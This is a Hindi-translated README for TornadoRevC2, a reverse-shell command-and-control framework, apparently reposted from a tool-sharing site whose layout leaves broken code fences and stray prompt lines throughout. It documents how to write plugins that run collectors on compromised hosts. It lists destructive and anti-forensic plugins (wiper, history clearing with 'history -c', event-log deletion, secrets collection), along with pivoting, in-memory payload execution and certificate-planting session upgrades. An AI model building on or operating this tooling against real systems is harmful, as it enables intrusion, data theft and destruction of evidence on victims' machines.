    def _linux_collector_source(): # Runs inside a try/except wrapper on the target. # Call _emit(result) with a JSON-serializable dict — do NOT print markers yourself. return r''' import subprocess result = {'summary': {}, 'processes': []} try: out = subprocess.check_output(['ps', 'auxww'], stderr=subprocess.STDOUT, timeout=10) lines = out.decode('utf-8', errors='replace').splitlines() result['summary'] = {'count': max(0, len(lines) - 1)} result['processes'] = lines[1:51] except Exception as exc: result['summary'] = {'error': str(exc)} _emit(result) '''

    def _build_linux_command(): return build_linux_collector_command(_linux_collector_source())

    def _build_windows_command(): return rf""" $ErrorActionPreference='SilentlyContinue' $start='{PLUGIN_MARK_START}'; $end='{PLUGIN_MARK_END}' $procs = Get-CimInstance Win32_Process -EA 0 | Select-Object -First 50 ProcessId, Name, CommandLine $result = [ordered]@{{ summary = @{{ count = @($procs).Count }} processes = @($procs) }} Write-Output ($start + (ConvertTo-Json $result -Depth 4 -Compress) + $end) """

    @plugin.command( name="processes", platforms=["linux", "windows", "unix"], description="List running processes on the remote host", ) def run(session: SessionContext, args): return run_collector_plugin( session, "processes", _build_linux_command, # callable — built at execution time _build_windows_command, # callable — built at execution time format_generic_report, # turns parsed dict into operator-facing text timeout=25.0, # seconds to wait for marked output )

    root@kitploit:~
    **`run_collector_plugin` पैरामीटर:**
    
    | पैरामीटर | प्रकार | विवरण |
    |-----------|------|-------------|
    | `session` | `SessionContext` | लक्ष्य सत्र |
    | `plugin_name` | `str` | लॉग और त्रुटि संदेशों में उपयोग किया जाने वाला नाम |
    | `unix_builder` | `Callable[[], str]` या `None` | Unix/Linux शेल कमांड लौटाता है; यदि उपलब्ध न हो तो `None` |
    | `win_builder` | `Callable[[], str]` या `None` | PowerShell स्क्रिप्ट लौटाता है; यदि उपलब्ध न हो तो `None` |
    | `formatter` | `Callable[[dict], str]` | पार्स किए गए JSON dict को रिपोर्ट स्ट्रिंग में परिवर्तित करता है |
    | `timeout` | `float` | चिह्नित आउटपुट की प्रतीक्षा करने के लिए अधिकतम सेकंड (डिफ़ॉल्ट 30) |
    
    उस OS पर प्लगइन को अनुपलब्ध चिह्नित करने के लिए प्लेटफ़ॉर्म बिल्डर के लिए `None` पास करें (देखें [Platform-specific plugins](#platform-specific-plugins))।
    
    बाहरी प्लगइन सहेजने के बाद:```bash
    plugins load processes
    plugins info processes
    run processes 1
    

    पैटर्न 3: कस्टम हैंडलर

    जब आपको आर्ग्युमेंट वैलिडेशन, डायनामिक कलेक्टर निर्माण, पोस्ट-कलेक्टर प्रोसेसिंग, या ऑपरेटर-साइड फ़ाइल हैंडलिंग की आवश्यकता हो जो अकेले run_collector_plugin कवर नहीं करता, तब इसका उपयोग करें।

    कोडबेस में उदाहरण:

    प्लगइनकस्टम व्यवहार
    memorymapPID आर्ग्युमेंट की आवश्यकता है; एम्बेडेड PID के साथ कलेक्टर को डायनामिक रूप से बनाता है
    wiperरिमोट पाथ की आवश्यकता है; पुष्टि आउटपुट के साथ विनाशकारी क्रिया
    screenshotbase64 इमेज को डिकोड करता है और ऑपरेटर मशीन पर स्थानीय रूप से PNG सेव करता है
    historydelकलेक्टर चलाता है, फिर इन-मेमोरी हिस्ट्री क्लीनअप के लिए फॉलो-अप शेल कमांड भेजता है
    clipboardहार्ड error के बजाय reason फ़ील्ड के माध्यम से कस्टम सॉफ्ट-फेल्योर हैंडलिंग

    आर्ग्युमेंट वैलिडेशन उदाहरण (memorymap से):```python import re from tornadorevc2.plugins import plugin, SessionContext from tornadorevc2.plugins.shared.runner import _run_collector_marked, parse_collector_json

    @plugin.command( name="memorymap", platforms=["linux", "windows", "unix"], description="Enumerate memory maps for a process (requires PID)", ) def run(session: SessionContext, args): if not args or not re.match(r"^\d+$", args[0].strip()): session.print("Usage: run memorymap ", "yellow") return 1

    root@kitploit:~
    pid = args[0].strip()
    session.log_event(f"Plugin memorymap: started for PID {pid}")
    session._handler._flush_shell(session._client_sock, timeout=1.0)
    
    unix_cmd = _build_linux_command(pid)   # builder accepts runtime args
    win_ps = _build_windows_command(pid)
    
    raw = _run_collector_marked(session, unix_cmd, win_ps, session.platform, 45.0)
    if raw is None:
        session.print("Plugin 'memorymap' failed — no response from target.", "red")
        return 1
    
    data = parse_collector_json(raw)
    report = format_memorymap_report(data)
    session.print(report, "cyan")
    session.log_plugin_result("memorymap", report, ...)
    return 0
    
    root@kitploit:~
    **संग्रह-पश्चात प्रसंस्करण उदाहरण** (`historydel` से):```python
    def run(session: SessionContext, args):
        # ... run collector via _run_collector_marked ...
        data = parse_collector_json(raw)
    
        # Additional in-memory cleanup in the interactive shell
        if session.is_unix:
            session.run_shell("history -c 2>/dev/null; history -w 2>/dev/null; true", timeout=5.0)
        elif session.is_windows:
            session.run_marked("", "Clear-History -ErrorAction SilentlyContinue", timeout=5.0)
    
        report = format_historydel_report(data)
        session.print(report, "green" if data.get("cleared") else "yellow")
        return 0
    

    मार्क्ड एक्ज़ीक्यूशन तक सीधी पहुँच के लिए, पूरे कलेक्टर रैपर के बिना, plugins/shared/runner.py से _run_collector_marked और parse_collector_json का उपयोग करें।

    Linux कलेक्टर

    Linux कलेक्टर Python सोर्स स्ट्रिंग्स हैं जो build_linux_collector_command() के माध्यम से टारगेट पर निष्पादित होते हैं।

    संरचना:

    1. एक रॉ स्ट्रिंग (r'''...''') लौटाने वाला _linux_collector_source() परिभाषित करें।
    2. कलेक्टर लॉजिक लिखें जो एक result डिक्ट बनाता है।
    3. अंत में _emit(result) को कॉल करें — कभी भी मार्कर मैन्युअली प्रिंट न करें।
    4. _build_linux_command() → build_linux_collector_command(source) से रैप करें।

    linux/_helpers.py में रैपर स्वचालित रूप से:

    • आपके सोर्स को एक try/except ब्लॉक के अंदर इंडेंट करता है
    • _emit(obj) को परिभाषित करता है जो __T_PLUGIN_START__ + JSON + __T_PLUGIN_END__ लिखता है
    • अनहैंडल्ड एक्सेप्शन पर {"error": "...", "traceback": "..."} एमिट करता है
    • इनलाइन एक्ज़ीक्यूशन के लिए स्क्रिप्ट को python3 -c (या python2 फ़ॉलबैक) के माध्यम से एनकोड करता है
    • चंक्ड /tmp स्टेजिंग पर केवल तब फ़ॉलबैक करता है जब एनकोडेड पेलोड ~4000 बाइट्स से अधिक हो जाता है

    नेटिव कमांड्स को प्राथमिकता दें:```python def sh(cmd, timeout=5): try: out = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT, timeout=timeout) return out.decode("utf-8", "ignore") except Exception: return ""

    result = {"summary": {}, "ports": []} output = sh("ss -tulpn 2>/dev/null || netstat -tulpn 2>/dev/null", 10) for line in output.splitlines()[:60]: result["ports"].append(line.strip()) _emit(result)

    root@kitploit:~
    **दिशानिर्देश:**
    
    - हर बाहरी कमांड के लिए `subprocess.check_output(..., timeout=N)` का उपयोग करें।
    - उत्सर्जन से पहले बड़ी सूचियों को छोटा करें (50–80 प्रविष्टियों तक सीमित रखें)।
    - अनुपलब्ध टूल्स को सहजता से संभालें—त्रुटि उठाने के बजाय अनुभागों को खाली छोड़ दें।
    - आउटपुट में मार्कर स्ट्रिंग्स एम्बेड करने से बचें; `history` प्लगइन इसी कारण से एकत्र किए गए टेक्स्ट से `__T_PLUGIN_*__` को साफ़ करता है।
    - इनलाइन आकार सीमा के भीतर रहने और `/tmp` स्टेजिंग से बचने के लिए कलेक्टरों को संक्षिप्त रखें।
    
    ### Windows कलेक्टर
    
    Windows कलेक्टर PowerShell स्क्रिप्ट स्ट्रिंग्स हैं जो `_build_windows_command()` से लौटाए जाते हैं।
    
    **संरचना:**```python
    from tornadorevc2.constants import PLUGIN_MARK_END, PLUGIN_MARK_START
    
    def _build_windows_command():
        return rf"""
    $ErrorActionPreference='SilentlyContinue'
    $start='{PLUGIN_MARK_START}'; $end='{PLUGIN_MARK_END}'
    $result = [ordered]@{{
      summary = @{{ count = 0 }}
      items = @()
    }}
    try {{
      Get-CimInstance Win32_Service -EA 0 | Select-Object -First 50 | ForEach-Object {{
        $result.items += @{{ name = $_.Name; state = $_.State }}
      }}
      $result.summary.count = $result.items.Count
    }} catch {{
      $result.summary.error = $_.Exception.Message
    }}
    Write-Output ($start + (ConvertTo-Json $result -Depth 5 -Compress) + $end)
    """
    

    दिशानिर्देश:

    • शीर्ष पर हमेशा $ErrorActionPreference='SilentlyContinue' सेट करें।
    • उन cmdlets पर -EA 0 (ErrorAction SilentlyContinue) का उपयोग करें जो पुराने सिस्टम पर विफल हो सकते हैं।
    • Python f-strings और raw f-strings के अंदर brace-doubling आवश्यक है: PowerShell hashtables और script blocks के लिए {{ और }}।
    • JSON आउटपुट में key क्रम बनाए रखने के लिए [ordered]@{{...}} का उपयोग करें।
    • बाहरी टूल्स की तुलना में अंतर्निहित cmdlets (Get-NetTCPConnection, Get-Process, netsh, wevtutil) को प्राथमिकता दें।
    • प्रत्येक तार्किक अनुभाग को अपने स्वयं के try/catch में लपेटें ताकि एक विफलता पूरे collector को निरस्त न करे।
    • इंटरैक्टिव PowerShell सत्रों पर, विश्वसनीय आउटपुट कैप्चर के लिए स्क्रिप्ट्स win_client.py के माध्यम से in-process वितरित की जाती हैं।

    विकल्प: न्यूनतम entry points वाले Windows-only plugins के लिए, एकल build_command() फ़ंक्शन का उपयोग करें:```python

    tornadorevc2/plugins/windows/services.py

    @plugin.command(name="services", platforms=["windows"], description="...") def run(session: SessionContext, args): return run_collector_plugin(session, "services", None, build_command, format_generic_report, timeout=35.0)

    root@kitploit:~
    ### JSON payload परंपराएँ
    
    कलेक्टरों को एक JSON-सीरियलाइज़ेबल dict लौटाना चाहिए। रनर और फ़ॉर्मेटर सुसंगत key उपयोग की अपेक्षा करते हैं:
    
    | Key | Type | Purpose |
    |-----|------|---------|
    | `summary` | `dict` | उच्च-स्तरीय गणनाएँ और आँकड़े; `format_generic_report()` द्वारा पहले रेंडर किया जाता है |
    | `error` | `str` | **हार्ड विफलता** — रनर त्रुटि प्रिंट करता है और exit code 1 लौटाता है |
    | `traceback` | `str` | वैकल्पिक; जब `error` सेट हो तो विवरण के रूप में लॉग किया जाता है |
    | `reason` | `str` | **सॉफ्ट विफलता** — कस्टम फ़ॉर्मेटरों के साथ उपयोग करें (जैसे clipboard अनुपलब्ध) |
    | `ok` | `bool` | ऑपरेशनल प्लगइन्स (screenshot, clipboard) के लिए सफलता फ़्लैग |
    | `dict` की सूचियाँ | `list` | `format_generic_report()` द्वारा तालिकाओं के रूप में रेंडर की जाती हैं |
    | `str` की सूचियाँ | `list` | बुलेट सूचियों के रूप में रेंडर की जाती हैं |
    | नेस्टेड `dict` | `dict` | लेबल किए गए अनुभागों के रूप में रेंडर किया जाता है |
    
    **सौम्य अपकर्षण:** बहु-अनुभाग गणना के लिए, प्रत्येक अनुभाग के लिए अलग dict keys का उपयोग करें और अपवादों को स्थानीय रूप से पकड़ें। शीर्ष-स्तरीय `error` तब तक सेट न करें जब तक कि पूरा कलेक्टर विफल न हो जाए—आंशिक परिणाम बेहतर होते हैं।```python
    result = {"summary": {}, "ufw": {}, "iptables": {}}
    # Each backend probed independently; failures leave that section empty
    

    कस्टम फ़ॉर्मेटर

    format_generic_report के बजाय run_collector_plugin को एक कस्टम फ़ॉर्मेटर पास करें:```python from tornadorevc2.plugins.shared.common import format_section, format_list_section

    def format_firewall_report(data: dict) -> str: sections = [] summary = data.get("summary") or {} if summary: sections.append(format_section("Summary", summary)) for key in ("ufw", "iptables", "windows_defender_firewall"): block = data.get(key) if isinstance(block, dict) and block: sections.append(format_section(key.replace("_", " ").title(), block)) if not sections: return "Firewall: no data collected." return "\n\n".join(sections)

    root@kitploit:~
    `plugins/shared/common.py` में पुनः प्रयोग योग्य हेल्पर:
    
    | फ़ंक्शन | उद्देश्य |
    |----------|---------|
    | `format_generic_report(data, title='Results')` | डिफ़ॉल्ट टेबल/सेक्शन रेंडरर |
    | `format_section(title, fields, width=22)` | की-वैल्यू सेक्शन |
    | `format_list_section(title, items, empty='(none)')` | बुलेटेड सूची |
    | `format_table_section(title, rows, columns)` | डिक्ट पंक्तियाँ कॉलम के रूप में |
    | `format_firewall_report`, `format_memorymap_report`, आदि | प्लगइन-विशिष्ट फ़ॉर्मेटर |
    
    ### प्लेटफ़ॉर्म-विशिष्ट प्लगइन
    
    **केवल Windows:**```python
    @plugin.command(name="rdp", platforms=["windows"], description="...")
    def run(session: SessionContext, args):
        return run_collector_plugin(
            session, "rdp",
            None,                    # no Linux builder
            build_command,
            format_generic_report,
            timeout=35.0,
        )
    

    केवल Linux:```python @plugin.command(name="cron", platforms=["linux", "unix"], description="...") def run(session: SessionContext, args): return run_collector_plugin( session, "cron", build_linux_command, None, # no Windows builder format_generic_report, timeout=30.0, )

    root@kitploit:~
    **स्प्लिट बिल्डर्स के साथ क्रॉस-प्लेटफ़ॉर्म:**
    
    कुछ साझा प्लगइन्स प्लेटफ़ॉर्म-विशिष्ट बिल्डर मॉड्यूल्स को डेलिगेट करते हैं (जैसे `virtualization` `linux/virtualization.py` और `windows/virtualization.py` से इम्पोर्ट करता है)। `@plugin.command` एंट्री पॉइंट `shared/` में ही रहता है; `linux/` या `windows/` के अंतर्गत बिल्डर मॉड्यूल्स में कोई डेकोरेटर नहीं होता और वे स्वतंत्र प्लगइन्स के रूप में रजिस्टर नहीं होते।
    
    ### बाहरी प्लगइन्स
    
    बाहरी प्लगइन्स आपको रिपॉज़िटरी को संशोधित किए बिना TornadoRevC2 का विस्तार करने देते हैं।
    
    **सेटअप:**```bash
    # Default location (created automatically if missing)
    ./plugins/myplugin.py
    
    # Or set a custom directory
    export TORNADOREVC2_PLUGIN_DIR=/path/to/my/plugins
    

    कार्यप्रवाह:```bash

    From the handler console

    plugins load myplugin # import and register commands plugins info myplugin # verify name, platforms, description, module path run myplugin 1 # execute against session 1 run myplugin 1 --verbose # extra args passed to handler as args=["--verbose"] plugins reload myplugin # re-import after editing (clears stale registrations) plugins unload myplugin # fully unload external plugin

    root@kitploit:~
    **बाहरी बनाम अंतर्निहित लाइफसाइकिल:**
    
    | क्रिया | अंतर्निहित प्लगइन | बाहरी प्लगइन |
    |--------|-----------------|-----------------|
    | `plugins unload` | सॉफ्ट-डिसेबल (मॉड्यूल इम्पोर्टेड रहता है) | पूरी तरह अनलोड और अनरजिस्टर्ड |
    | `plugins reload` | मॉड्यूल को पुनः इम्पोर्ट करता है, पुरानी कमांड रजिस्ट्रेशन साफ़ करता है | `sys.modules` से हटाता है, डिस्क से पुनः इम्पोर्ट करता है |
    | स्टार्टअप | ऑटो-लोडेड | मांग पर लोडेड |
    
    नेमस्पेस टकराव से बचने के लिए बाहरी मॉड्यूल `tornado_ext_plugin_<name>` के रूप में इम्पोर्ट किए जाते हैं।
    
    ### SessionContext API
    
    प्रत्येक हैंडलर को एक `SessionContext` प्राप्त होता है जो हैंडलर और क्लाइंट सॉकेट को रैप करता है:
    
    **मेटाडेटा प्रॉपर्टीज़:**
    
    | प्रॉपर्टी | प्रकार | विवरण |
    |----------|------|-------------|
    | `session_id` | `str` | असाइन किया गया सत्र पहचानकर्ता |
    | `platform` | `str` | `unix`, `windows`, या `unknown` |
    | `is_windows` / `is_unix` | `bool` | प्लेटफ़ॉर्म सुविधा फ़्लैग |
    | `sysinfo` | `dict` | `sysinfo` संग्रह से कैश्ड होस्ट जानकारी |
    | `identity` | `dict` | सत्र पहचान/फ़िंगरप्रिंट मेटाडेटा |
    | `addr` | `tuple` | रिमोट पता |
    | `tls` | `bool` | क्या सत्र TLS का उपयोग करता है |
    | `name` | `str` | ऑपरेटर द्वारा असाइन किया गया फ्रेंडली नाम |
    | `fingerprint` | `str` | स्थिर होस्ट फ़िंगरप्रिंट |
    | `logger` | `SessionLogger` | प्रति-सत्र लॉग राइटर (`None` हो सकता है) |
    | `colors` | `dict` | कंसोल रंग कोड |
    | `socket` | socket | रॉ क्लाइंट सॉकेट (उन्नत उपयोग) |
    
    **निष्पादन विधियाँ:**
    
    | विधि | विवरण |
    |--------|-------------|
    | `run_shell(cmd, timeout=15.0)` | कमांड भेजें, आउटपुट की प्रतीक्षा करें, स्ट्रिंग लौटाएँ |
    | `run_shell_streaming(cmd, timeout, idle_timeout, on_chunk)` | आइडल डिटेक्शन के साथ आउटपुट स्ट्रीम करें; लंबे समय तक चलने वाले कमांड के लिए उपयोगी |
    | `run_marked(unix_cmd, win_ps_script, timeout, start_mark, end_mark, strip_ws)` | प्लेटफ़ॉर्म-उपयुक्त कमांड निष्पादित करें और चिह्नित पेलोड निकालें |
    | `get_cwd()` | रिमोट वर्किंग डायरेक्टरी लौटाएँ |
    | `collect_sysinfo(mode='stealth')` | होस्ट जानकारी संग्रह ट्रिगर करें |
    
    **स्थानांतरण विधियाँ:**
    
    | विधि | विवरण |
    |--------|-------------|
    | `upload(local_path, remote_path, resume=False)` | लक्ष्य पर फ़ाइल अपलोड करें |
    | `download(remote_path, local_path, resume=False)` | लक्ष्य से फ़ाइल डाउनलोड करें |
    | `verify_remote(remote_path)` | रिमोट फ़ाइल आकार और SHA-256 सत्यापित करें |
    
    **लॉगिंग और आउटपुट:**
    
    | विधि | विवरण |
    |--------|-------------|
    | `print(text, color=None)` | वैकल्पिक रंग (`red`, `green`, `yellow`, `cyan`) के साथ ऑपरेटर कंसोल पर प्रिंट करें |
    | `log_event(message)` | `session.log` में टाइमस्टैम्प्ड इवेंट जोड़ें |
    | `log_command(cmd, output)` | कमांड और आउटपुट को `session.log` में लॉग करें |
    | `log_plugin_result(name, report, detail='')` | रिपोर्ट को `logs/<session>/plugins/<name>_<timestamp>.log` में लिखें |
    
    ### त्रुटि प्रबंधन और रिटर्न कोड
    
    | रिटर्न | अर्थ | हैंडलर व्यवहार |
    |--------|---------|------------------|
    | `0` | सफलता | कोई चेतावनी प्रदर्शित नहीं |
    | `1` (या कोई भी गैर-शून्य) | विफलता | पीली चेतावनी: `Plugin 'name' returned code N` |
    | अनकैच्ड एक्सेप्शन | त्रुटि | लाल त्रुटि संदेश; सत्र लॉग में लॉग किया गया |
    
    **कलेक्टर विफलता मोड** (`run_collector_plugin` द्वारा संभाला गया):
    
    | स्थिति | व्यवहार |
    |-----------|----------|
    | टाइमआउट / आउटपुट में कोई मार्कर नहीं | एग्ज़िट 1, "no response" लॉग करें |
    | आउटपुट मान्य JSON नहीं | एग्ज़िट 1, रॉ आउटपुट (ट्रंकेटेड) को विवरण के रूप में लॉग करें |
    | `data["error"]` मौजूद | एग्ज़िट 1, त्रुटि और ट्रेसबैक प्रिंट करें |
    | आंशिक सेक्शन विफलताएँ | टॉप-लेवल `error` सेट **नहीं** करना चाहिए; सेक्शन खाली छोड़ें |
    
    **सॉफ्ट विफलताएँ** (ऑपरेशनल प्लगइन): `reason` या `ok: false` का उपयोग करें और रनर के हार्ड `error` चेक पर निर्भर रहने के बजाय कस्टम फ़ॉर्मेटर या कस्टम हैंडलर में संभालें।
    
    ### सर्वोत्तम प्रथाएँ
    
    1. **अपलोड किए गए टूलिंग की तुलना में नेटिव OS कमांड को प्राथमिकता दें**—यह फ्रेमवर्क के डिपेंडेंसी-लाइट डिज़ाइन के अनुरूप है।
    2. **एन्यूमरेशन के लिए लक्ष्य पर फ़ाइलें न लिखें**; शेल चैनल पर डेटा लौटाएँ। ऑपरेशनल प्लगइन (wiper, historydel) स्पष्ट उद्देश्य वाले अपवाद हैं।
    3. **शालीनता से डिग्रेड करें** — प्रत्येक बैकएंड को स्वतंत्र रूप से प्रोब करें; खाली सेक्शन कुल विफलता से बेहतर हैं।
    4. **आउटपुट आकार सीमित करें** — सूचियों को 50–80 आइटम तक ट्रिम करें; लंबे स्ट्रिंग्स को 200–500 वर्णों तक ट्रंकेट करें।
    5. **वास्तविक टाइमआउट सेट करें** — त्वरित प्रोब: 15–30s; व्यापक एन्यूमरेशन: 45–75s।
    6. **लगातार लॉग करें** — शुरुआत में `session.log_event()` कॉल करें, पूर्ण होने पर `session.log_plugin_result()`, ट्रांसक्रिप्ट एक्सपोर्ट के लिए `session.log_command()`।
    7. **args को जल्दी मान्य करें** — लक्ष्य पर कुछ भी भेजने से पहले उपयोग संदेश के साथ 1 लौटाएँ।
    8. **दोनों कंसोल से परीक्षण करें** — मुख्य हैंडलर (`run plugin <ID>`) और अटैच्ड सत्र (`switch` फिर `run plugin`)।
    9. **विकास के दौरान `plugins reload` का उपयोग करें** हैंडलर को पुनः आरंभ किए बिना परिवर्तनों को उठाने के लिए।
    10. **संवेदनशील मार्कर साफ़ करें** एकत्रित आउटपुट से यदि आपका प्लगइन मनमाना फ़ाइल सामग्री पढ़ता है।
    
    ### संदर्भ कार्यान्वयन
    
    | प्लगइन | फ़ाइल | पैटर्न | नोट्स |
    |--------|------|---------|-------|
    | `firewall` | `plugins/shared/firewall.py` | क्रॉस-प्लेटफ़ॉर्म कलेक्टर | मल्टी-बैकएंड शालीन डिग्रेडेशन |
    | `ports` | `plugins/shared/ports.py` | क्रॉस-प्लेटफ़ॉर्म कलेक्टर | नेटिव `ss` / `Get-NetTCPConnection` |
    | `history` | `plugins/shared/history.py` | क्रॉस-प्लेटफ़ॉर्म कलेक्टर | Linux Python + Windows PowerShell बिल्डर |
    | `memorymap` | `plugins/shared/memorymap.py` | कस्टम हैंडलर | PID आर्गुमेंट, डायनामिक बिल्डर |
    | `screenshot` | `plugins/shared/screenshot.py` | कस्टम हैंडलर | JSON में Base64; ऑपरेटर-साइड PNG सेव |
    | `clipboard` | `plugins/shared/clipboard.py` | कस्टम हैंडलर | `reason` फ़ील्ड के माध्यम से सॉफ्ट विफलता |
    | `historydel` | `plugins/shared/historydel.py` | कस्टम हैंडलर | विनाशकारी; पोस्ट-कलेक्टर शेल क्लीनअप |
    | `wiper` | `plugins/shared/wiper.py` | कस्टम हैंडलर | विनाशकारी; पथ आर्गुमेंट सत्यापन |
    | `services` | `plugins/windows/services.py` | Windows-केवल कलेक्टर | न्यूनतम एंट्री पॉइंट |
    | `eventlogdel` | `plugins/windows/eventlogdel.py` | Windows-केवल कलेक्टर | विनाशकारी; प्रति-लॉग विफलता रिपोर्टिंग |
    | `rdp` | `plugins/windows/rdp.py` | Windows-केवल कलेक्टर | रजिस्ट्री और फ़ायरवॉल एन्यूमरेशन |
    | `virtualization` | `plugins/shared/virtualization.py` | साझा एंट्री + स्प्लिट बिल्डर | `linux/` और `windows/` बिल्डर इम्पोर्ट करता है |
    | `secrets` | `plugins/linux/secrets.py` | Linux-केवल कलेक्टर | प्लेटफ़ॉर्म-प्रतिबंधित लिस्टिंग |
    
    नए एन्यूमरेशन प्लगइन के लिए, `plugins/shared/runner.py` में `run_collector_plugin` से शुरू करें और `firewall.py` या `ports.py` से लेआउट कॉपी करें। आर्गुमेंट या साइड इफेक्ट वाले प्लगइन के लिए, `memorymap.py` या `wiper.py` देखें।
    
    ---
    
    ## सत्र लॉगिंग
    
    प्रत्येक सत्र `logs/` के अंतर्गत एक पृथक डायरेक्टरी में लिखता है:```text
    logs/001_user@hostname_192.168.1.10_unix_10-08-2026_143022/
      session.log           Operator commands and console output
      sysinfo.json          Host information snapshot
      transfers/            Upload and download event logs
      executions/           In-memory payload execution metadata
      plugins/              Plugin reports and collector output
          quickenum_20260812_054812.log
          firewall_20260812_055130.log
          screenshot_20260812_055412.png
    

    Plugin लॉग में एक मानव-पठनीय रिपोर्ट होती है और, जब लागू हो, रिमोट कलेक्टर द्वारा लौटाया गया कच्चा JSON पेलोड भी।


    Project Structure```text

    TornadoRevC2/ ├── tornadorevc2.py Entry point ├── tornadorevc2/ │ ├── handler.py Listeners, sessions, operator console │ ├── updater.py Git-based self-update and restart │ ├── sysinfo.py Host information collection │ ├── terminal.py PTY/TTY management │ ├── transfer.py Chunked file transfers │ ├── tunnel.py SOCKS5 pivoting │ ├── remote_exec.py Remote command builders │ ├── win_client.py Windows shell detection and script delivery │ ├── session_registry.py Session persistence and reconnect logic │ ├── session_log.py Per-session directory logging │ ├── export.py HTML transcript export │ ├── payloads.py Built-in payload catalog │ └── plugins/ │ ├── api.py SessionContext and plugin registration │ ├── manager.py Plugin lifecycle and execution │ ├── loader.py Module discovery │ ├── shared/ Cross-platform plugins │ ├── linux/ Linux/Unix-only plugins │ └── windows/ Windows-only plugins ├── plugins/ Optional external plugin directory └── logs/ Session output (created at runtime)

    root@kitploit:~
    ---
    
    ## TLS और mTLS कॉन्फ़िगरेशन
    
    TornadoRevC2 तीन अलग-अलग लिसनर चलाता है, प्रत्येक का अपना प्रमाणपत्र स्रोत होता है। `tls_certs/` और `mtls_certs/` के अंतर्गत सब कुछ पहली बार चलाने पर स्वतः-उत्पन्न होता है और कभी अधिलेखित नहीं होता।
    
    | लिसनर | पोर्ट | क्लाइंट प्रमाणीकरण | प्रमाणपत्र |
    |----------|------|-------------|--------------|
    | TCP | `4444` | कोई नहीं | — |
    | TLS | `8443` | केवल-सर्वर | `tls_certs/server.pem`, `tls_certs/server.key` |
    | mTLS | `9443` | पारस्परिक (क्लाइंट प्रमाणपत्र आवश्यक) | `mtls_certs/` बंडल |
    
    ### TLS
    
    स्वतः-हस्ताक्षरित जोड़ी (`CN=localhost`, RSA-2048, 3650 दिन) के रूप में स्वतः-उत्पन्न।
    
    अपना स्वयं का प्रदान करने के लिए:```bash
    python tornadorevc2.py -H 0.0.0.0 -p 4444 -tp 8443 \
      -c tls_certs/server.pem -k tls_certs/server.key
    

    यदि क्लाइंट किसी IP पते का उपयोग करके कनेक्ट करता है, तो सर्वर प्रमाणपत्र में उस IP को उसके Subject Alternative Name (SAN) में शामिल करना चाहिए। होस्टनेम सत्यापन को अक्षम करने से बचें जब तक कि ऐसा करने का कोई विशिष्ट कारण न हो।

    mTLS

    पहली बार चलाने पर, mtls_certs/ के अंतर्गत एक पूर्ण PKI बूटस्ट्रैप किया जाता है:

    • ca.pem / ca.key — स्व-हस्ताक्षरित CA (RSA-4096, CN=TornadoRevC2-mTLS-CA)
    • server-mtls.pem / server-mtls.key — CA द्वारा हस्ताक्षरित सर्वर प्रमाणपत्र
    • client.pem / client.key — CA द्वारा हस्ताक्षरित क्लाइंट प्रमाणपत्र
    • ca.srl — प्रमाणपत्र हस्ताक्षर के दौरान उत्पन्न OpenSSL सीरियल काउंटर

    अधिकृत क्लाइंट के साथ client.pem + client.key + ca.pem भेजें। क्लाइंट को कनेक्ट करते समय अपना प्रमाणपत्र प्रस्तुत करना होगा अन्यथा हैंडशेक अस्वीकार कर दिया जाता है।

    स्पष्ट पथों के साथ प्रारंभ करें:```bash python tornadorevc2.py -H 0.0.0.0 -mp 9443
    --mtls-ca-cert mtls_certs/ca.pem --mtls-ca-key mtls_certs/ca.key
    --mtls-server-cert mtls_certs/server-mtls.pem --mtls-server-key mtls_certs/server-mtls.key
    --mtls-client-cert mtls_certs/client.pem --mtls-client-key mtls_certs/client.key

    root@kitploit:~
    ### लाइव सेशन को mTLS में अपग्रेड करना
    
    सादे TCP या server-auth TLS पर मौजूद सेशन को हैंडलर को रीस्टार्ट किए बिना mTLS लिसनर पर ले जाया जा सकता है। `upgrade_mtls` प्लगइन `client.pem`, `client.key`, और `ca.pem` को टारगेट पर अपलोड करता है, एक बैकग्राउंड शेल लॉन्च करता है जो क्लाइंट सर्टिफिकेट प्रस्तुत करता है, और (डिफ़ॉल्ट रूप से) नया सेशन शुरू होने के बाद बंडल को डिस्क से हटा देता है।```bash
    # From the main handler prompt
    run upgrade_mtls 1 --port 9443 --host 10.10.14.7
    run upgrade_mtls 1 --keep-bundle       # leave certs on disk after launch
    run upgrade_mtls 1 --no-upload         # certificate bundle already uploaded manually
    
    # From inside an attached session (switch 1)
    run upgrade_mtls
    

    फ़्लैग्स

    फ़्लैगडिफ़ॉल्ट
    -H / --host0.0.0.0
    -p / --port4444
    -tp / --tls-port8443
    -mp / --mtls-port9443
    -c / --cert, -k / --keytls_certs/server.{pem,key}
    --mtls-ca-cert / --mtls-ca-keymtls_certs/ca.{pem,key}
    --mtls-server-cert / --mtls-server-keymtls_certs/server-mtls.{pem,key}
    --mtls-client-cert / --mtls-client-keymtls_certs/client.{pem,key}

    लाइसेंस

    यह प्रोजेक्ट GNU General Public License v3.0 के अंतर्गत लाइसेंस प्राप्त है।

    टूल डाउनलोड करें